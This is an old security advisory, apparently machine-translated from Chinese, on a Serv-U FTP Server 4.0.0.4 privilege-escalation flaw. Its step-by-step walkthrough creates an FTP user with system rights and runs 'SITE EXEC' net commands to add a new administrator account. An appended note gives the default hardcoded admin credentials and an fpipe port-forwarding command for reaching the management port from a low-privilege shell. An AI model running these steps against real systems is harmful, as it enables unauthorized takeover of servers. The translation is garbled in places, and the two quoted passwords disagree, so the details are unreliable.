Created: 2003-12-24 Updated: 2003-12-24
Article attribute: original
Article submission:
Fedora (Justaid_at_sohu.com)
(If you can't publish, please do not transfer to the forum, thank you.)
Discovery time: 2003-12-20
Article attribute: original
Author: Fedora (justaid_at_sohu.com)
Vulnerability Description:
Serv-U FTP Server is a FTP Server software produced by Rhinosoft, which is running under the Microsoft Windows platform.
Servuadmin.exe is the FTP Server management interface, due to the incorrect processing of exceptions, resulting in the SERV-U
When registering is a system service, the local ordinary user performs permission to get the permissions of the superuser. Remote use ordinary user privileges,
It can also be improved by landing through 3389.
testing method:
test environment:
Microsoft Windows 2000 (SP4) Serv-U FTP Server 4.0.0.4
Microsoft Windows Server 2003, Enterprise Edition Serv-U FTP Server 4.0.0.4
testing method:
First, install SERV-U
Log in with ordinary users, not enough, can not be installed, re-installed SERV-U (default installation, at this time, SERV-U
The start-up mode is automatically started, and has been registered as a system service. After installation, start the Serv-U, then log out of Administrator.
Second, improve authority
Use ordinary users to log in, enter the installation directory of Serv-U FTP Server, run Servuadmin.exe, new domain, and add users,
New user ftpuser, set the main directory as the system directory C:, at this time, the user ftpuser is R ---- L - i, set the user permissions to
System administrator, even higher levels, or set the user's access to the directory to read and write deletion, jump out of servuadmin.ini
You cannot write, servuadmin.exe is also rewritten at SERVUADMIN.INI at System Permissions. This ftpuser has the FTP.
Permissions to delete the system directory. This will make permissions, you can pass on the wooden, run again, or straight
Add a system user.
FTP> Open IP
Connected to IP.
220 Serv-U FTP Server V4.0 for Winsock Ready ...
User (IP: (NONE)): FTPUSER / / Enter FTP User
331 USER Name Okay, please send complete e-mail address as password.
Password: password // password
230 User logged in, proced.
FTP> CD WinNT // Enter Win2K's Winnt directory, if WinXP or Win 2003 should be a Windows directory.
250 Directory Changed to / Winnt
FTP> CD System32 // Enter the System32 directory
250 Directory Changed to / Winnt / System32
FTP> Quote Site EXEC NET.EXE User CC CC / Add // Adds users using the net command. 200 Exec Command Successful (TID = 33).
FTP> Quote Site Exec Net.exe LocalHost Administrators CC / Add / / Improved to Super User
Vulnerability analysis
1. SERV-U can only be installed with Administrator, its configuration file servudaemon.ini and servuadmin.ini. NTFS format default
Dip Tutong users only have permissions for reading and running (by default only Admin and System write permissions), can not rewrite them
Improve permissions.
2, when Serv-U is a system service, it has the case of SYSTEM, although servuadmin.exe has permission verification, but by
The abnormal handling is incorrect, and the servuadmin.ini is written, resulting in the generation of vulnerabilities.
Thanks to the purple fantasy, no one of his articles, I will not play the idea of Serv-U.
statement
This book is only used to describe the possible security issues, the author does not provide any guarantee or commitment to this security announcement. Use this due to communication
Any direct or indirect consequences of the information provided by the article are being responsible by the user himself. This article does not support this.
What responsibility. The author has the right to modify and interpret this safety announcement. If you want to reprint or disseminate this article, you must guarantee the integrity of this article.
All contents such as copyright statements. This article is not allowed to modify or increase the announcement without any authority.
Eyas Note:
Serv-U defaults 127.0.0.1:43958, so only in this unit can connect to this management port.
Serv-u default management account is LOCALADMINISTRAtor, the default password is "#L@ or @ $#.lk; 0 @p", this password is in the same
The version is fixed, perhaps it is also fixed in different versions.
If the target machine IP is 192.168.0.1, if you already have a shell of the normal authority of a target machine, then you
Run FPIPE -V -L 12345 -R 43958 127.0.0.1 on the target machine, then use "Serv-U" in your own machine
"New Server,"
192.168.0.1:12345
User: Localadministrator
Pass: "# l@lk#.lk; 0 @p"
Then, the SERV-U of the target machine is managed.
(You don't need to log in to the terminal or physical console, as long as there is a shell, you can run the program forwarded by the port data)
